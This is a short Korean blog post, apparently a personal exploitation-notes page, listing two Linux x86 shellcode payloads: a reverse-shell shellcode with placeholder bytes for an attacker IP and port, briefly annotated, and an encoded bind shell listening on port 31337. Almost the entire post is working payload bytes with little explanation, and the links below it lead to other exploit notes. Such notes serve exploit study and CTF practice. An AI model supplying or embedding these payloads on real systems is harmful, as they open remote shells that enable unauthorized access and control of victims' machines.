티스토리 뷰
Reverse Shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | shellcode = "\x68\xIP1\xIP2\xIP3\xIP4\x5e\x66\x68\x12\x34\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53" "\x6a\x02\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x56\x66\x57" "\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73" "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xce" ShellCode 설명 "\x68 \xIP1\xIP2\xIP3\xIP4 -> IP 주소 \x5e\x66\x68 \x12\x34 -> 내부 포트 \x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53 \x6a\x02\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x56\x66\x57 \x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73 \x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xce" | cs |
Bind Shell(Port 31337)
1 2 3 4 5 6 7 8 9 | "\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9" "\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02" "\xb5\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33" "\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16" "\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe" "\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5" "\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02" "\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97" "\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5" | cs |
'System > Linux' 카테고리의 다른 글
Memory Leak으로 얻은 주소로 offset 알아내기 (0) | 2016.05.01 |
---|---|
Heap chunk 정리 (0) | 2016.04.14 |
SROP 정리 (0) | 2016.01.11 |
ropgadget find (0) | 2016.01.06 |
32bit와 64bit의 차이 (0) | 2015.12.29 |
댓글